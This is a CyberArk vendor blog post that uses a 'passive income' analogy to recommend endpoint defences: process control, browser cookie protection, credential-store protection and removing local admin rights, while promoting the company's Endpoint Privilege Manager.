Securing Endpoints By Applying ‘Passive Income’ Concepts

September 8, 2023 Andrey Pozhogin

securing endpoints

Investing in cybersecurity is a lot like working hard to save for retirement. Your budget’s already tight, but you must secure the future. You’re faced with endless headlines and market updates that make you nervous about making the wrong choices – or not making moves quickly enough amid fast-changing conditions. Under pressure, many focus on identifying the investments (effort, time, money) that are best positioned to keep generating income for you while requiring little or no maintenance. In other words, work smart – not hard.

This makes sense in the cybersecurity world, too. You should ask yourself what passive income ideas may help you achieve your cybersecurity goals faster.

Of course, it’s easier said than done. But some nice, no-nonsense cybersecurity “investments” will continuously generate “income” through saved time, calmer nerves and fewer expended resources. Every cybersecurity professional should look for focal points – the centers of maximum risk concentration. These points repeatedly show up in all kinds of attack kill chains. Then, you need to set up rules to reduce or eliminate the attack surface around these points so you can keep working normally (while for someone else using them for nefarious purposes – or anything else – it should become extremely difficult).

Here are some focal points that you can focus (pun intended) on to break most attack chains:

Focal Point No. 3: Break Common Exploit Techniques

Many exploits take advantage of software bugs, vulnerabilities or legitimate functionality to cause them to operate in ways that assist attackers. Many are relatively easy to implement, particularly those requiring minimal user interaction. An example of little interaction could be a recent CVE-2023-36884 exploit, which, according to the CVE description, an attacker would need “… a specially crafted Microsoft Office document that enables them to perform remote code execution in the context of the victim. However, an attacker would have to convince the victim to open the malicious file.”

Convince the victim to open the file? I mean, what could be easier? …

“Dear HR, please find my CV attached.”

All set!

Okay, so what should be the “passive income” investment here? What we need to stop from happening is a situation when an application spawns another application in an elevated mode. The technique is called child and parent process control. It will protect through various exploits that target PowerShell, MS Office, Adobe Acrobat and many other applications.

Focal Point No. 2.: Make Your Web Browser a Secure Browser

Session hijacking becomes the attacker’s weapon of choice. It’s beautiful in its simplicity. All you need to do is steal a tiny text file from the target’s machine, which can provide access to the victim’s email, documents or cloud configuration consoles. The scariest thing about session hijacking is that it bypasses all the complex user authentication systems IT puts in place, including multi-factor authentication (MFA).

The focal point here is the browser, of course. We must restrict access to the browser’s memory and cookies with privilege threat protection to prevent a successful attack. By preventing cookie stealing, we can thwart session hijacking, no matter how the attacker attempts to access session data.

This “investment” is quickly rising in importance as more and more threat actors turn to attacking browsers, considering they can gain access to critical systems and sensitive data, such as financial transaction systems, SCADA control and cloud configuration consoles, security tool web interfaces, data lakes and email systems.

Focal Point No. 1: Defend Credentials Everywhere

Another focal point that is very common in many attacks is user and administrator credentials, security tokens, passwords and password hashes. Security professionals set up IT systems in a way that scatters credentials and other bits of trust (tokens, hashes, cookies, certificates) across endpoints. If attackers can access those items, they can gain persistence, move laterally, elevate privileges and deliver impact. In a recent example, a threat actor dubbed Storm-0558, according to Microsoft, “… accesses credentials from a variety of sources, including the LSASS process memory and Security Account Manager (SAM) registry hive. … once Storm-0558 has access to the desired user credentials, the actor signs into the compromised user’s cloud email account with the valid account credentials.”

And, in yet another data breach, at least “…179,000 AWS Console credentials, 2,300 Google Cloud credentials, 64,500 DocuSign credentials, 15,500 QuickBooks credentials, 23,000 Salesforce credentials, 66,000 CRM credentials” were stolen with information stealers and listed for sale. Information stealers are a type of malware that steals data stored in applications such as web browsers, email clients, instant messengers, cryptocurrency wallets, FTP clients and gaming services – in other words, scattered across each machine in every organization, waiting to be found and stolen by attackers.

By blocking access to various credential stores within the operating system and third-party applications, you can protect your users and endpoints from many threats, making this technique a terrific passive cybersecurity income technique. CyberArk Endpoint Privilege Manager has over 50 different rules preventing credential and security token theft, and new rules are constantly added and dynamically delivered to endpoints, for example, a new rule for workstations and servers that protects Discord, a popular communication platform, from various data theft methods that can help prevent a data breach.

Focal Point No. 0: Abuse of User Privileges

Preventing the abuse of user privileges should be the first on the list, but we felt it could be a little repetitive for you if you read our blog regularly – hence the zero. Beating a dead horse would likely be the proverbial description, except the horse is still very much alive. While everyone seemingly agrees about this security best practice – no user should work under local admin – we still see organizations where users keep working as admins. CISA issued an advisory focused on detecting advanced persistent threat (APT) activity targeting Outlook online that recommends the following as a general cloud migration: “Separate administrator accounts from user accounts according to the National Institute of Standards and Technology’s (NIST’s) guidance, AC-5: Separation of Duties.” and “Only allow designated administrator accounts to be used for administration purposes. If an individual user requires administrative rights over their workstation, use a separate account without administrative access to other hosts.”

My take regarding endpoint privilege security is even more radical: No user should have local admin rights. Period. CyberArk Endpoint Privilege Manager can take care of all the necessary elevations whenever a user requires elevated privileges. And for any conceivable scenario when policies are too rigid to permit an automatic elevation, there are several ways to quickly resolve it including just-in-time (JIT) policies and offline authorization. These methods are much quicker than having a system administrator remotely connect to your machine. And if you are a local administrator, you’re taking on enormous risk because cyber incidents are bound to happen.

Breaking the Attack Kill Chain (The Easy Way)

So, there you have it. Take care of these focal points. Thankfully, it’s relatively easy to do (given the right tools) and is a set-and-forget activity – just like passive income! Once set, attacks will continuously hit a wall, considering the attackers will find themselves disarmed and toolless. We can’t promise that after reading this post, you’ll have a clear roadmap to financial independence and early retirement, but we hope you found some helpful advice here that will save you some time and maybe a grey hair or more.

Author’s note: Oh, by the way, CyberArk Endpoint Privilege Manager has these and many more threat mitigation rules as a part of QuickStart – our rapid risk reduction and least privilege framework.

Andrey Pozhogin is a senior product marketing manager at CyberArk.

Previous Article
CyberArk Named a Leader in the Gartner® Magic Quadrant™ for PAM for the Fifth Time
CyberArk Named a Leader in the Gartner® Magic Quadrant™ for PAM for the Fifth Time

Today, I’m honored to share that CyberArk has been named a Leader in the “2023 Gartner® Magic Quadrant™ for...

Next Article
Infographic: Insider Threats Exceed Malicious Intentions
Infographic: Insider Threats Exceed Malicious Intentions

The SANS Institute recently found that nearly a third of all organizations still have no capability to prev...